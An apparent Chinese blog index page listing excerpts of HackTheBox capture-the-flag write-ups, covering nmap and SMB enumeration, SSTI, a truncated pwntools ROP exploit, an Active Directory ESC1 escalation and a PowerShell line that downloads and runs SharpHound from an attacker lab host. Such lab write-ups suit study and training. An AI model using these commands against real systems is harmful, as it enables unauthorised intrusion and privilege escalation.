HTB
  • 2024-06-20入门一.HTB--pwned
    资源以及wp官方视频:https://www.youtube.com/watch?v=LMCKbR_wWds大佬:渗透测试学习日记之第一天:Meow_哔哩哔哩_bilibili下载vpn并连接下载好复制到kalisudoopenvpnstarting_point_yx.ovpn连接看到框框说明连接成功查看ip地址(主机地址/本地地址/创建的地址)
  • 2024-06-03hack the box之Spectra
    Spectra介绍探测访问10.10.10.229:80端口找到spectra.htbandwww.spectra.htb反向代理http://spectra.htb/main/http://www.spectra.htb/testing/index.php在/etc/hosts中添加spectra.htb再用目录猜解工具gobuster扫域名,这是一个扫描目录文件、DNS和VHost爆破
  • 2024-05-27HTB-starting-TIER0
    TIER-0【一】用Ping测试与ICMP回显请求的目标连接各常见端口服务20/21FTP【文件传输协议】其中20用于数据传输(即主动模式下,服务器从20端口主动文件上传/下载);21用于客户端和服务器之间的命令传输22SSH【SSH远程登录协议】23Telnet【应用程序协议】使用root用户名
  • 2024-04-11HTB-Vaccine
    HTB-Vaccine1.TASK1问题:除了SSH和HTTP,这个盒子上还托管了什么服务?一、端口扫描nmap-sV-sC10.129.172.3可以发现目标主机开发了ftp、ssh和http三个端口,其中ftp支持匿名模式登录,并且存在一个backup.zip文件同时在网页中访问ip,存在一个登录界面答案:ftp2.TASK2问题:此
  • 2024-04-11HTB Headless writeup
      对IP进行信息收集,nmap和fscan扫描出只开了22和5000端口 5000端口是一个web,暂时看不出什么扫描出两个路径,/dashborad和/support 提示未登录  这个页面只有几个输入框和一个提交按钮,想到了xss? BP启动!完蛋,有waf仔细观察下来cookie的值is_admin,加上waf上面
  • 2024-04-07HTB-Archetype
    HTB-Archetype1.TASK1问题:哪个TCP端口托管着数据库服务器?识别运行数据库服务的端口,通常通过端口扫描(如使用nmap)来完成。nmap-sV10.129.57.230答案:14332.TASK2问题:通过SMB共享的非管理员共享的名称是什么?smbclient-L10.129.57.230答案:backups3.TASK3问题
  • 2024-04-05HTB-Three
    HTB-Three1.TASK1输入命令:nmap-sS-sV10.129.247.144-sC使用默认脚本扫描-sV探测服务/版本信息答案:22.TASK2问题:网站“联系人”部分提供的电子邮件地址的域是什么?答案:thetoppers.htb3.TASK3问题:在没有DNS服务器的情况下,我们可以使用哪个Linux文件将主机名
  • 2024-04-03HTB-Responder
    HTB-Responder1.TASK1问题:使用IP地址访问Web服务时,我们要重定向到的域是什么?答案:unika.htb2.TASK2由于网站无法打开,需要在/etc/hosts里把域名加入注意这里得用root帐号修改,否则无法修改修改完成后可正常打开用Wappalyzer插件可以发现是PHP或者可以用BP抓包发现
  • 2024-04-01HTB-Sequel(SQL)
    HTB-Sequel(SQL)1.TASK1问题:在我们的扫描里,哪个端口运行着我们找到的mysql?nmap-Pn-T4-sV10.129.119.235答案:33062.TASK2问题:目标正在运行哪个社区开发的MySQL版本?nmap-Pn-A-p330610.129.119.235答案:MariaDB3.TASK3问题:我们需要使用哪个参数来指定MySQ
  • 2024-03-30HTB Perfection-wp 基于ruby的SSTI注入、密码爆破工具hashcat的使用、反弹shell的编码绕过、ruby正则匹配
    一进来发现这个页面,估计突破点就是在这里了 当然也可走一下固定的流程,nmap扫一下、dir爆破一下。这里不太像是sql的注入点(并不是查询功能),就不用sql试了。首先第一反应时看到WEBrick模板框架,考虑有没有版本漏洞,但是在几个CVE数据库搜一下都没有对应版本的漏洞。那么走一下正常
  • 2024-03-21HTB打靶——Bizness
    #简述关于HacktheBox的Bizness机器渗透过程。靶机:10.10.11.252攻击机(Kali):10.10.14.39#过程1、连接OpenVPN后,使用nmap对靶机进行端口扫描:nmap-A10.10.11.2522、扫描得到的结果发现该靶机开启了**22、80、443**端口,其中根据信息显示,该靶机运行这一个nginx的web服务器,同时
  • 2024-03-16【HTB】Sherlocks Recollection 蓝队 easy
    工具:volatility2.6(2比3完善) https://www.volatilityfoundation.org/25kali下载volatility2.6#下载pip2sudowgethttps://bootstrap.pypa.io/pip/2.7/get-pip.pysudopython2get-pip.py#pycrypto、distorm3所需依赖sudopython2-mpipinstall-Usetuptoolswh
  • 2024-03-15HTB_pwn_pet_companion_exp
    frompwnimport*context.log_level='debug'elf=ELF('./pet_companion')io=remote('94.237.54.152',51111)padding=72pop_rdi=0x0000000000400743#:poprdi;retpop_rsi=0x0000000000400741#:poprsi;retpayload=b
  • 2024-03-06HTB-Fawn(FTP)
    HTB-Fawn(FTP)1.TASK1问题:3个字母的首字母缩写词FTP代表什么?FTP是文件传输协议的简写。FTP文件传输协议(FileTransferProtocol)是用于在网络上进行文件传输的一套标准协议,它工作在OSI模型的第七层,TCP模型的第四层—————应用层,FTP使用TCP传输而不是UDP传输,它有两
  • 2024-02-17HTB/鳄鱼
    继续下一关!还是免费的一关这一关包含了1.ftp匿名登录,拿到用户名和密码文件2.使用gobuster爆破字目录/文件这里访问login.php用之前拿到的用户名和密码登录就可以拿到flag了
  • 2024-02-16HTB/续集
    继续!下一关到目前的HTB还是比较基础主要还是因为免费
  • 2024-02-16HTB/预约
    这其实不是第五关!因为真的第五关是要钱的!换一个免费的玩这一关就是最简单的sql注入了
  • 2024-02-13HTB/Redeemer
    继续第四关!开始还是标志的一个Nmap扫描,Redis默认端口就是6379redis通过selectindex索引的方式切换不同的数据库成功获取flag!
  • 2024-02-13HTB/Dance
    继续第三关DanceSMB协议就是用来共享文件和打印机等资源的,默认监听445端口问我们版本是什么,直接nmap-sV就可以看到这里是考察smbclient的使用,可以再man手册中看到,列举就是用-L这里其实就是考了一下smbclient获取smb共享的一些基本操作,可以看https://access.redh
  • 2024-01-15hackthebox outdated windows medium
    CONNECTbetweenwindowsandlinuxBloodhoundCollectionGrabthelatestcopyofSharpHound.exefromtheBloodhoundrepo,uploadittoOutdated,workingoutofC:\programdataiwrhttp://10.10.14.5:8888/SharpHound.exe-outfiles.exe.\s.exe-Call2022-0
  • 2023-12-29WINDOWS ESC1 escalate privilege
    ESC1utilizationconditions:ESC1needstomeetfollowingrequirementstousesuccessfully1.Havepermissiontoaccquirecertificate2.thevalueof pkiextendedkeyusageis ClientAuthentication,EncryptingFileSystem,SecureEmail  orsmartcardlogin3.CT
  • 2023-12-27hackthebox absolute insane
     信息收集Payattentiontothelastlinessl-date:wehave7hourclockskew,whichshouldkeepinmindifdoinganykeberosauth.SMB-TCP445smbclient-N-L//10.10.11.181#对面拒绝连接crackmapexecsmbabsolute.htb  #对面存在smbcrackmapexec
  • 2023-12-20【HTB】Sherlocks Hyperfiletable 蓝队 easy
    工具:analyzeMFT.py:https://github.com/dkovar/analyzeMFTanalyzeMFT:https://ericzimmerman.github.io/#!index.mdTask1问题:MFT的MD5哈希值是什么?certUtil-hashfilemft.rawmd5答案:3730c2fedcdc3ecd9b83cbea08373226Task2问题:系统上唯一用户的名称是什么?用anal
  • 2023-12-19【HTB】Sherlocks Tracer 蓝队 easy
    .pf文件:windows预读取文件.evtx文件:日志文件$Extend:USN日志MFTECmd下载:https://ericzimmerman.github.io/#!index.mdEventLogExplorer下载:https://eventlogxp.com/download.php?s=1&u=bTask1问题:SOC团队怀疑对手潜伏在他们的环境中,并正在使用PsExec进行横向移动
  • 2023-12-19HTB devvortex
    HTBdevvortex靶机记录一个比较简单的靶机,但是也是学习不少,思路再次扩宽信息收集首先namp扫一下,结果如下┌──(kali㉿kali)-[~]└─$nmap-sV10.10.11.242StartingNmap7.93(https://nmap.org)at2023-12-1823:38HKTStats:0:00:59elapsed;0host